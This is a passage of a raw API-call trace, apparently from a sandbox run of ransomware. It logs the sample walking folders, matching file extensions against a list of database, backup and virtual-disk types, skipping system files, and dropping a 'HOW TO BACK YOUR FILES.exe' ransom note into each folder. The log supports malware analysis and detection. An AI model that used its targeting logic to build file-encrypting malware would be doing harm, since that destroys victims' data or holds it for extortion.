(lpString="dad") returned 3 [0040.268] lstrcmpiW (lpString1="ini", lpString2="dad") returned 1 [0040.268] lstrlenW (lpString="dadiagrams") returned 10 [0040.268] lstrcmpiW (lpString1="esktop.ini", lpString2="dadiagrams") returned 1 [0040.268] lstrlenW (lpString="daschema") returned 8 [0040.268] lstrcmpiW (lpString1="ktop.ini", lpString2="daschema") returned 1 [0040.268] lstrlenW (lpString="db-journal") returned 10 [0040.268] lstrcmpiW (lpString1="esktop.ini", lpString2="db-journal") returned 1 [0040.268] lstrlenW (lpString="db-shm") returned 6 [0040.268] lstrcmpiW (lpString1="op.ini", lpString2="db-shm") returned 1 [0040.268] lstrlenW (lpString="db-wal") returned 6 [0040.268] lstrcmpiW (lpString1="op.ini", lpString2="db-wal") returned 1 [0040.269] lstrlenW (lpString="dbc") returned 3 [0040.269] lstrcmpiW (lpString1="ini", lpString2="dbc") returned 1 [0040.269] lstrlenW (lpString="dbs") returned 3 [0040.269] lstrcmpiW (lpString1="ini", lpString2="dbs") returned 1 [0040.269] lstrlenW (lpString="dbt") returned 3 [0040.269] lstrcmpiW (lpString1="ini", lpString2="dbt") returned 1 [0040.269] lstrlenW (lpString="dbv") returned 3 [0040.269] lstrcmpiW (lpString1="ini", lpString2="dbv") returned 1 [0040.269] lstrlenW (lpString="dbx") returned 3 [0040.269] lstrcmpiW (lpString1="ini", lpString2="dbx") returned 1 [0040.269] lstrlenW (lpString="dcb") returned 3 [0040.269] lstrcmpiW (lpString1="ini", lpString2="dcb") returned 1 [0040.269] lstrlenW (lpString="dct") returned 3 [0040.269] lstrcmpiW (lpString1="ini", lpString2="dct") returned 1 [0040.269] lstrlenW (lpString="dcx") returned 3 [0040.269] lstrcmpiW (lpString1="ini", lpString2="dcx") returned 1 [0040.269] lstrlenW (lpString="ddl") returned 3 [0040.269] lstrcmpiW (lpString1="ini", lpString2="ddl") returned 1 [0040.269] lstrlenW (lpString="dlis") returned 4 [0040.269] lstrcmpiW (lpString1=".ini", lpString2="dlis") returned -1 [0040.269] lstrlenW (lpString="dp1") returned 3 [0040.269] lstrcmpiW (lpString1="ini", lpString2="dp1") returned 1 [0040.269] lstrlenW (lpString="dqy") returned 3 [0040.269] lstrcmpiW (lpString1="ini", lpString2="dqy") returned 1 [0040.269] lstrlenW (lpString="dsk") returned 3 [0040.269] lstrcmpiW (lpString1="ini", lpString2="dsk") returned 1 [0040.269] lstrlenW (lpString="dsn") returned 3 [0040.269] lstrcmpiW (lpString1="ini", lpString2="dsn") returned 1 [0040.269] lstrlenW (lpString="dtsx") returned 4 [0040.269] lstrcmpiW (lpString1=".ini", lpString2="dtsx") returned -1 [0040.269] lstrlenW (lpString="dxl") returned 3 [0040.269] lstrcmpiW (lpString1="ini", lpString2="dxl") returned 1 [0040.269] lstrlenW (lpString="eco") returned 3 [0040.269] lstrcmpiW (lpString1="ini", lpString2="eco") returned 1 [0040.269] lstrlenW (lpString="ecx") returned 3 [0040.269] lstrcmpiW (lpString1="ini", lpString2="ecx") returned 1 [0040.270] lstrlenW (lpString="edb") returned 3 [0040.270] lstrcmpiW (lpString1="ini", lpString2="edb") returned 1 [0040.270] lstrlenW (lpString="epim") returned 4 [0040.270] lstrcmpiW (lpString1=".ini", lpString2="epim") returned -1 [0040.270] lstrlenW (lpString="fcd") returned 3 [0040.270] lstrcmpiW (lpString1="ini", lpString2="fcd") returned 1 [0040.270] lstrlenW (lpString="fdb") returned 3 [0040.270] lstrcmpiW (lpString1="ini", lpString2="fdb") returned 1 [0040.270] lstrlenW (lpString="fic") returned 3 [0040.270] lstrcmpiW (lpString1="ini", lpString2="fic") returned 1 [0040.270] lstrlenW (lpString="flexolibrary") returned 12 [0040.270] lstrlenW (lpString="fm5") returned 3 [0040.270] lstrcmpiW (lpString1="ini", lpString2="fm5") returned 1 [0040.270] lstrlenW (lpString="fmp") returned 3 [0040.270] lstrcmpiW (lpString1="ini", lpString2="fmp") returned 1 [0040.270] lstrlenW (lpString="fmp12") returned 5 [0040.270] lstrcmpiW (lpString1="p.ini", lpString2="fmp12") returned 1 [0040.270] lstrlenW (lpString="fmpsl") returned 5 [0040.270] lstrcmpiW (lpString1="p.ini", lpString2="fmpsl") returned 1 [0040.270] lstrlenW (lpString="fol") returned 3 [0040.270] lstrcmpiW (lpString1="ini", lpString2="fol") returned 1 [0040.270] lstrlenW (lpString="fp3") returned 3 [0040.270] lstrcmpiW (lpString1="ini", lpString2="fp3") returned 1 [0040.270] lstrlenW (lpString="fp4") returned 3 [0040.270] lstrcmpiW (lpString1="ini", lpString2="fp4") returned 1 [0040.270] lstrlenW (lpString="fp5") returned 3 [0040.270] lstrcmpiW (lpString1="ini", lpString2="fp5") returned 1 [0040.270] lstrlenW (lpString="fp7") returned 3 [0040.270] lstrcmpiW (lpString1="ini", lpString2="fp7") returned 1 [0040.270] lstrlenW (lpString="fpt") returned 3 [0040.270] lstrcmpiW (lpString1="ini", lpString2="fpt") returned 1 [0040.270] lstrlenW (lpString="frm") returned 3 [0040.270] lstrcmpiW (lpString1="ini", lpString2="frm") returned 1 [0040.270] lstrlenW (lpString="gdb") returned 3 [0040.270] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0040.270] lstrlenW (lpString="gdb") returned 3 [0040.271] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0040.271] lstrlenW (lpString="grdb") returned 4 [0040.271] lstrcmpiW (lpString1=".ini", lpString2="grdb") returned -1 [0040.271] lstrlenW (lpString="gwi") returned 3 [0040.271] lstrcmpiW (lpString1="ini", lpString2="gwi") returned 1 [0040.271] lstrlenW (lpString="hdb") returned 3 [0040.271] lstrcmpiW (lpString1="ini", lpString2="hdb") returned 1 [0040.271] lstrlenW (lpString="his") returned 3 [0040.271] lstrcmpiW (lpString1="ini", lpString2="his") returned 1 [0040.271] lstrlenW (lpString="ib") returned 2 [0040.271] lstrcmpiW (lpString1="ni", lpString2="ib") returned 1 [0040.271] lstrlenW (lpString="idb") returned 3 [0040.271] lstrcmpiW (lpString1="ini", lpString2="idb") returned 1 [0040.271] lstrlenW (lpString="ihx") returned 3 [0040.271] lstrcmpiW (lpString1="ini", lpString2="ihx") returned 1 [0040.271] lstrlenW (lpString="itdb") returned 4 [0040.271] lstrcmpiW (lpString1=".ini", lpString2="itdb") returned -1 [0040.271] lstrlenW (lpString="itw") returned 3 [0040.271] lstrcmpiW (lpString1="ini", lpString2="itw") returned -1 [0040.271] lstrlenW (lpString="jet") returned 3 [0040.271] lstrcmpiW (lpString1="ini", lpString2="jet") returned -1 [0040.271] lstrlenW (lpString="jtx") returned 3 [0040.271] lstrcmpiW (lpString1="ini", lpString2="jtx") returned -1 [0040.271] lstrlenW (lpString="kdb") returned 3 [0040.271] lstrcmpiW (lpString1="ini", lpString2="kdb") returned -1 [0040.271] lstrlenW (lpString="kexi") returned 4 [0040.271] lstrcmpiW (lpString1=".ini", lpString2="kexi") returned -1 [0040.271] lstrlenW (lpString="kexic") returned 5 [0040.271] lstrcmpiW (lpString1="p.ini", lpString2="kexic") returned 1 [0040.271] lstrlenW (lpString="kexis") returned 5 [0040.271] lstrcmpiW (lpString1="p.ini", lpString2="kexis") returned 1 [0040.271] lstrlenW (lpString="lgc") returned 3 [0040.271] lstrcmpiW (lpString1="ini", lpString2="lgc") returned -1 [0040.271] lstrlenW (lpString="lwx") returned 3 [0040.271] lstrcmpiW (lpString1="ini", lpString2="lwx") returned -1 [0040.271] lstrlenW (lpString="maf") returned 3 [0040.272] lstrcmpiW (lpString1="ini", lpString2="maf") returned -1 [0040.272] lstrlenW (lpString="maq") returned 3 [0040.272] lstrcmpiW (lpString1="ini", lpString2="maq") returned -1 [0040.272] lstrlenW (lpString="mar") returned 3 [0040.272] lstrcmpiW (lpString1="ini", lpString2="mar") returned -1 [0040.272] lstrlenW (lpString="marshal") returned 7 [0040.272] lstrcmpiW (lpString1="top.ini", lpString2="marshal") returned 1 [0040.272] lstrlenW (lpString="mas") returned 3 [0040.272] lstrcmpiW (lpString1="ini", lpString2="mas") returned -1 [0040.272] lstrlenW (lpString="mav") returned 3 [0040.272] lstrcmpiW (lpString1="ini", lpString2="mav") returned -1 [0040.272] lstrlenW (lpString="maw") returned 3 [0040.272] lstrcmpiW (lpString1="ini", lpString2="maw") returned -1 [0040.272] lstrlenW (lpString="mdbhtml") returned 7 [0040.272] lstrcmpiW (lpString1="top.ini", lpString2="mdbhtml") returned 1 [0040.272] lstrlenW (lpString="mdn") returned 3 [0040.272] lstrcmpiW (lpString1="ini", lpString2="mdn") returned -1 [0040.272] lstrlenW (lpString="mdt") returned 3 [0040.272] lstrcmpiW (lpString1="ini", lpString2="mdt") returned -1 [0040.272] lstrlenW (lpString="mfd") returned 3 [0040.272] lstrcmpiW (lpString1="ini", lpString2="mfd") returned -1 [0040.272] lstrlenW (lpString="mpd") returned 3 [0040.272] lstrcmpiW (lpString1="ini", lpString2="mpd") returned -1 [0040.272] lstrlenW (lpString="mrg") returned 3 [0040.272] lstrcmpiW (lpString1="ini", lpString2="mrg") returned -1 [0040.272] lstrlenW (lpString="mud") returned 3 [0040.272] lstrcmpiW (lpString1="ini", lpString2="mud") returned -1 [0040.272] lstrlenW (lpString="mwb") returned 3 [0040.272] lstrcmpiW (lpString1="ini", lpString2="mwb") returned -1 [0040.272] lstrlenW (lpString="myd") returned 3 [0040.272] lstrcmpiW (lpString1="ini", lpString2="myd") returned -1 [0040.272] lstrlenW (lpString="ndf") returned 3 [0040.272] lstrcmpiW (lpString1="ini", lpString2="ndf") returned -1 [0040.272] lstrlenW (lpString="nnt") returned 3 [0040.272] lstrcmpiW (lpString1="ini", lpString2="nnt") returned -1 [0040.272] lstrlenW (lpString="nrmlib") returned 6 [0040.272] lstrcmpiW (lpString1="op.ini", lpString2="nrmlib") returned 1 [0040.272] lstrlenW (lpString="ns2") returned 3 [0040.273] lstrcmpiW (lpString1="ini", lpString2="ns2") returned -1 [0040.273] lstrlenW (lpString="ns3") returned 3 [0040.273] lstrcmpiW (lpString1="ini", lpString2="ns3") returned -1 [0040.273] lstrlenW (lpString="ns4") returned 3 [0040.273] lstrcmpiW (lpString1="ini", lpString2="ns4") returned -1 [0040.273] lstrlenW (lpString="nsf") returned 3 [0040.273] lstrcmpiW (lpString1="ini", lpString2="nsf") returned -1 [0040.273] lstrlenW (lpString="nv") returned 2 [0040.273] lstrcmpiW (lpString1="ni", lpString2="nv") returned -1 [0040.273] lstrlenW (lpString="nv2") returned 3 [0040.273] lstrcmpiW (lpString1="ini", lpString2="nv2") returned -1 [0040.273] lstrlenW (lpString="nwdb") returned 4 [0040.273] lstrcmpiW (lpString1=".ini", lpString2="nwdb") returned -1 [0040.273] lstrlenW (lpString="nyf") returned 3 [0040.273] lstrcmpiW (lpString1="ini", lpString2="nyf") returned -1 [0040.273] lstrlenW (lpString="odb") returned 3 [0040.273] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0040.273] lstrlenW (lpString="odb") returned 3 [0040.273] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0040.273] lstrlenW (lpString="oqy") returned 3 [0040.273] lstrcmpiW (lpString1="ini", lpString2="oqy") returned -1 [0040.273] lstrlenW (lpString="ora") returned 3 [0040.273] lstrcmpiW (lpString1="ini", lpString2="ora") returned -1 [0040.273] lstrlenW (lpString="orx") returned 3 [0040.273] lstrcmpiW (lpString1="ini", lpString2="orx") returned -1 [0040.273] lstrlenW (lpString="owc") returned 3 [0040.273] lstrcmpiW (lpString1="ini", lpString2="owc") returned -1 [0040.273] lstrlenW (lpString="p96") returned 3 [0040.273] lstrcmpiW (lpString1="ini", lpString2="p96") returned -1 [0040.273] lstrlenW (lpString="p97") returned 3 [0040.273] lstrcmpiW (lpString1="ini", lpString2="p97") returned -1 [0040.273] lstrlenW (lpString="pan") returned 3 [0040.273] lstrcmpiW (lpString1="ini", lpString2="pan") returned -1 [0040.273] lstrlenW (lpString="pdb") returned 3 [0040.273] lstrcmpiW (lpString1="ini", lpString2="pdb") returned -1 [0040.273] lstrlenW (lpString="pdm") returned 3 [0040.274] lstrcmpiW (lpString1="ini", lpString2="pdm") returned -1 [0040.274] lstrlenW (lpString="pnz") returned 3 [0040.274] lstrcmpiW (lpString1="ini", lpString2="pnz") returned -1 [0040.274] lstrlenW (lpString="qry") returned 3 [0040.274] lstrcmpiW (lpString1="ini", lpString2="qry") returned -1 [0040.274] lstrlenW (lpString="qvd") returned 3 [0040.274] lstrcmpiW (lpString1="ini", lpString2="qvd") returned -1 [0040.274] lstrlenW (lpString="rbf") returned 3 [0040.274] lstrcmpiW (lpString1="ini", lpString2="rbf") returned -1 [0040.274] lstrlenW (lpString="rctd") returned 4 [0040.274] lstrcmpiW (lpString1=".ini", lpString2="rctd") returned -1 [0040.274] lstrlenW (lpString="rod") returned 3 [0040.274] lstrcmpiW (lpString1="ini", lpString2="rod") returned -1 [0040.274] lstrlenW (lpString="rodx") returned 4 [0040.274] lstrcmpiW (lpString1=".ini", lpString2="rodx") returned -1 [0040.274] lstrlenW (lpString="rpd") returned 3 [0040.274] lstrcmpiW (lpString1="ini", lpString2="rpd") returned -1 [0040.274] lstrlenW (lpString="rsd") returned 3 [0040.274] lstrcmpiW (lpString1="ini", lpString2="rsd") returned -1 [0040.274] lstrlenW (lpString="sas7bdat") returned 8 [0040.274] lstrcmpiW (lpString1="ktop.ini", lpString2="sas7bdat") returned -1 [0040.274] lstrlenW (lpString="sbf") returned 3 [0040.274] lstrcmpiW (lpString1="ini", lpString2="sbf") returned -1 [0040.274] lstrlenW (lpString="scx") returned 3 [0040.274] lstrcmpiW (lpString1="ini", lpString2="scx") returned -1 [0040.274] lstrlenW (lpString="sdb") returned 3 [0040.274] lstrcmpiW (lpString1="ini", lpString2="sdb") returned -1 [0040.274] lstrlenW (lpString="sdc") returned 3 [0040.274] lstrcmpiW (lpString1="ini", lpString2="sdc") returned -1 [0040.274] lstrlenW (lpString="sdf") returned 3 [0040.274] lstrcmpiW (lpString1="ini", lpString2="sdf") returned -1 [0040.274] lstrlenW (lpString="sis") returned 3 [0040.274] lstrcmpiW (lpString1="ini", lpString2="sis") returned -1 [0040.274] lstrlenW (lpString="spq") returned 3 [0040.274] lstrcmpiW (lpString1="ini", lpString2="spq") returned -1 [0040.275] lstrlenW (lpString="te") returned 2 [0040.275] lstrcmpiW (lpString1="ni", lpString2="te") returned -1 [0040.275] lstrlenW (lpString="teacher") returned 7 [0040.275] lstrcmpiW (lpString1="top.ini", lpString2="teacher") returned 1 [0040.275] lstrlenW (lpString="tmd") returned 3 [0040.275] lstrcmpiW (lpString1="ini", lpString2="tmd") returned -1 [0040.275] lstrlenW (lpString="tps") returned 3 [0040.275] lstrcmpiW (lpString1="ini", lpString2="tps") returned -1 [0040.275] lstrlenW (lpString="trc") returned 3 [0040.275] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0040.275] lstrlenW (lpString="trc") returned 3 [0040.275] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0040.275] lstrlenW (lpString="trm") returned 3 [0040.275] lstrcmpiW (lpString1="ini", lpString2="trm") returned -1 [0040.275] lstrlenW (lpString="udb") returned 3 [0040.275] lstrcmpiW (lpString1="ini", lpString2="udb") returned -1 [0040.275] lstrlenW (lpString="udl") returned 3 [0040.275] lstrcmpiW (lpString1="ini", lpString2="udl") returned -1 [0040.275] lstrlenW (lpString="usr") returned 3 [0040.275] lstrcmpiW (lpString1="ini", lpString2="usr") returned -1 [0040.275] lstrlenW (lpString="v12") returned 3 [0040.275] lstrcmpiW (lpString1="ini", lpString2="v12") returned -1 [0040.275] lstrlenW (lpString="vis") returned 3 [0040.275] lstrcmpiW (lpString1="ini", lpString2="vis") returned -1 [0040.275] lstrlenW (lpString="vpd") returned 3 [0040.275] lstrcmpiW (lpString1="ini", lpString2="vpd") returned -1 [0040.275] lstrlenW (lpString="vvv") returned 3 [0040.275] lstrcmpiW (lpString1="ini", lpString2="vvv") returned -1 [0040.275] lstrlenW (lpString="wdb") returned 3 [0040.275] lstrcmpiW (lpString1="ini", lpString2="wdb") returned -1 [0040.275] lstrlenW (lpString="wmdb") returned 4 [0040.275] lstrcmpiW (lpString1=".ini", lpString2="wmdb") returned -1 [0040.275] lstrlenW (lpString="wrk") returned 3 [0040.275] lstrcmpiW (lpString1="ini", lpString2="wrk") returned -1 [0040.275] lstrlenW (lpString="xdb") returned 3 [0040.275] lstrcmpiW (lpString1="ini", lpString2="xdb") returned -1 [0040.276] lstrlenW (lpString="xld") returned 3 [0040.276] lstrcmpiW (lpString1="ini", lpString2="xld") returned -1 [0040.276] lstrlenW (lpString="xmlff") returned 5 [0040.276] lstrcmpiW (lpString1="p.ini", lpString2="xmlff") returned -1 [0040.276] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4977eaa0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4977eaa0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0040.276] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0040.276] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x497a4c00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x497a4c00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sample Music", cAlternateFileName="SAMPLE~1")) returned 1 [0040.276] lstrcmpiW (lpString1="Sample Music", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0040.276] lstrcmpiW (lpString1="Sample Music", lpString2="aoldtz.exe") returned 1 [0040.276] lstrcmpiW (lpString1="Sample Music", lpString2=".") returned 1 [0040.276] lstrcmpiW (lpString1="Sample Music", lpString2="..") returned 1 [0040.276] lstrcmpiW (lpString1="Sample Music", lpString2="windows") returned -1 [0040.276] lstrcmpiW (lpString1="Sample Music", lpString2="bootmgr") returned 1 [0040.276] lstrcmpiW (lpString1="Sample Music", lpString2="temp") returned -1 [0040.276] lstrcmpiW (lpString1="Sample Music", lpString2="pagefile.sys") returned 1 [0040.276] lstrcmpiW (lpString1="Sample Music", lpString2="boot") returned 1 [0040.276] lstrcmpiW (lpString1="Sample Music", lpString2="ids.txt") returned 1 [0040.276] lstrcmpiW (lpString1="Sample Music", lpString2="ntuser.dat") returned 1 [0040.276] lstrcmpiW (lpString1="Sample Music", lpString2="perflogs") returned 1 [0040.276] lstrcmpiW (lpString1="Sample Music", lpString2="MSBuild") returned 1 [0040.276] lstrlenW (lpString="Sample Music") returned 12 [0040.276] lstrlenW (lpString="C:\\Users\\Public\\Documents\\My Music\\desktop.ini") returned 46 [0040.276] lstrcpyW (in: lpString1=0x2e2e8a6, lpString2="Sample Music" | out: lpString1="Sample Music") returned="Sample Music" [0040.276] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7cc8 [0040.276] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x60) returned 0x2f2098 [0040.276] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2e7cd0 | out: ListHead=0x2e77d0, ListEntry=0x2e7cd0) returned 0x2e7cb0 [0040.276] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x497a4c00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x497a4c00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sample Music", cAlternateFileName="SAMPLE~1")) returned 0 [0040.276] FindClose (in: hFindFile=0x2ccfa8 | out: hFindFile=0x2ccfa8) returned 1 [0040.276] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2e7cd0 [0040.276] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Public\\Documents\\My Music\\Sample Music", iMaxLength=260 | out: lpString1="C:\\Users\\Public\\Documents\\My Music\\Sample Music") returned="C:\\Users\\Public\\Documents\\My Music\\Sample Music" [0040.276] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f2098 | out: hHeap=0x2b0000) returned 1 [0040.276] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7cc8 | out: hHeap=0x2b0000) returned 1 [0040.276] lstrlenW (lpString="C:\\Users\\Public\\Documents\\My Music\\Sample Music") returned 47 [0040.277] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Public\\Documents\\My Music\\Sample Music" | out: lpString1="C:\\Users\\Public\\Documents\\My Music\\Sample Music") returned="C:\\Users\\Public\\Documents\\My Music\\Sample Music" [0040.277] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0040.277] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Public\\Documents\\My Music\\Sample Music\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\public\\documents\\my music\\sample music\\how to back your files.exe"), bFailIfExists=1) returned 0 [0040.277] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0040.277] GetLastError () returned 0x0 [0040.277] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0040.277] ReadFile (in: hFile=0x124, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0040.277] CloseHandle (hObject=0x124) returned 1 [0040.277] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f8fb0 | out: hHeap=0x2b0000) returned 1 [0040.277] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0040.277] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents\\My Music\\Sample Music\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x497a4c00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x497a4c00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccfa8 [0040.278] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0040.278] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0040.278] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0040.278] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x497a4c00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x497a4c00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.278] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0040.278] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0040.278] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0040.278] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0040.278] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be84d57, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x24a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0040.278] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0040.278] lstrcmpiW (lpString1="desktop.ini", lpString2="aoldtz.exe") returned 1 [0040.278] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0040.278] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0040.278] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0040.278] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0040.278] lstrcmpiW (lpString1="desktop.ini", lpString2="temp") returned -1 [0040.278] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0040.278] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0040.278] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0040.278] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0040.278] lstrcmpiW (lpString1="desktop.ini", lpString2="perflogs") returned -1 [0040.278] lstrcmpiW (lpString1="desktop.ini", lpString2="MSBuild") returned -1 [0040.278] lstrlenW (lpString="desktop.ini") returned 11 [0040.278] lstrlenW (lpString="C:\\Users\\Public\\Documents\\My Music\\Sample Music\\*") returned 49 [0040.278] lstrcpyW (in: lpString1=0x2e2e8c0, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0040.278] lstrlenW (lpString="desktop.ini") returned 11 [0040.278] lstrlenW (lpString="Ares865") returned 7 [0040.278] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0040.278] lstrlenW (lpString=".dll") returned 4 [0040.278] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0040.278] lstrlenW (lpString=".lnk") returned 4 [0040.279] lstrcmpiW (lpString1="desktop.ini", lpString2=".lnk") returned 1 [0040.279] lstrlenW (lpString=".ini") returned 4 [0040.279] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0040.279] lstrlenW (lpString=".sys") returned 4 [0040.279] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0040.279] lstrlenW (lpString="desktop.ini") returned 11 [0040.279] lstrlenW (lpString="bak") returned 3 [0040.279] lstrcmpiW (lpString1="ini", lpString2="bak") returned 1 [0040.279] lstrlenW (lpString="ba_") returned 3 [0040.279] lstrcmpiW (lpString1="ini", lpString2="ba_") returned 1 [0040.279] lstrlenW (lpString="dbb") returned 3 [0040.279] lstrcmpiW (lpString1="ini", lpString2="dbb") returned 1 [0040.279] lstrlenW (lpString="vmdk") returned 4 [0040.279] lstrcmpiW (lpString1=".ini", lpString2="vmdk") returned -1 [0040.279] lstrlenW (lpString="rar") returned 3 [0040.279] lstrcmpiW (lpString1="ini", lpString2="rar") returned -1 [0040.279] lstrlenW (lpString="zip") returned 3 [0040.279] lstrcmpiW (lpString1="ini", lpString2="zip") returned -1 [0040.279] lstrlenW (lpString="tgz") returned 3 [0040.279] lstrcmpiW (lpString1="ini", lpString2="tgz") returned -1 [0040.279] lstrlenW (lpString="vbox") returned 4 [0040.279] lstrcmpiW (lpString1=".ini", lpString2="vbox") returned -1 [0040.279] lstrlenW (lpString="vdi") returned 3 [0040.279] lstrcmpiW (lpString1="ini", lpString2="vdi") returned -1 [0040.279] lstrlenW (lpString="vhd") returned 3 [0040.279] lstrcmpiW (lpString1="ini", lpString2="vhd") returned -1 [0040.279] lstrlenW (lpString="vhdx") returned 4 [0040.279] lstrcmpiW (lpString1=".ini", lpString2="vhdx") returned -1 [0040.279] lstrlenW (lpString="avhd") returned 4 [0040.279] lstrcmpiW (lpString1=".ini", lpString2="avhd") returned -1 [0040.279] lstrlenW (lpString="db") returned 2 [0040.279] lstrcmpiW 